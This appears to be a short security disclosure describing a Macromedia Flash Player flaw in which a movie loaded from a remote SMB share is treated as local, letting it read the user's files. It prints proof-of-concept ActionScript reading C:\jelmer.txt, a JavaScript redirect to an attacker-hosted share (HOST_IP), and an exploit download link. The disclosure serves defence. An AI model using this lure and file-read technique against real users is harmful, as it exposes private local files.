The following message apperently bounced the first time i send it :s
Flash player can read local files
Description
There is a flaw in the macromedia flash player wich allows reading and
sending of local files
The flaw lies in the fact that when a flash movie is loaded from a remote
smb share it is treated
as though it was loaded from the users harddisk.
Allowing the following action script code to work
urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");
function readXML() {
myField = urlXML.toString();
}
It uses the flash's xml control to read and display the contents of
c:\jelmer.txt
In order for it to work one has to get a user to view a specially crafted
webpage wich could look like this
<script language="javascript">
document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>
It points the browser to the swf on the smb share so that it displays it
Demonstration
Download the following file and extract the contained swf to a remote
share,
start it from there ( for instance by dragging it from the share into
explorer or creating a html file as described above)
http://www.xs4all.nl/~jkuperus/exploit.zip
It will read and display the contents of c:\jelmer.txt
A live demonstration is not provided because it really isn't good practice
to open up smb shares to the
outside world and i am only able to host this sort of stuff at my home
server
vendor status
Macromedia was notified a long time ago as far as I know they are still
looking in to it.
